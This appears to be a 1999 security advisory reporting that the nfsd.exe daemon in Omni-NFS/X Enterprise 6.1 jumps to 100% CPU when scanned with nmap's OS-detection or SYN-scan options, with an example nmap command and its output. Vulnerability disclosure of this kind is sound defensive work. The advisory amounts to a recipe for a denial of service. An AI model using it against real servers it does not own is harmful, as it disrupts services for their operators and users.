Omni-NFS/X Enterprise (nfsd.exe) DOS

[sfaust () ISI-MTL COM (S.Faust)]

Faulty software
---------------

Omni-NFS/X Enterprise version 6.1

Product
---------

Omni-NFS/X Enterprise  is a X, NFS server solution for win32 systems.
It is written by XLink Technology ( http://www.xlink.com ) .

Vulnerability
-------------

The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage
if you scan it
using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) )
.

Example:

((zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007)
$ nmap -O -p 111 slacky

Starting nmap V. 2.3BETA5 by Fyodor (fyodor () dhp com, www.insecure.org/nmap/)
Interesting ports on slacky (192.168.1.2):
Port    State       Protocol  Service
111     open        tcp       sunrpc

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=2 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
((zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008)
$

This was tested on  Microsoft Windows NT 4.0 Workstation with SP5 .
I'm preaty sure all their NFS solutions are affected by this.

------------------------------------------------
Sacha Faust sfaust () isi-mtl com
"He who despairs of the human condition is a coward, but he who has hope for
it is a fool. " - Albert Camus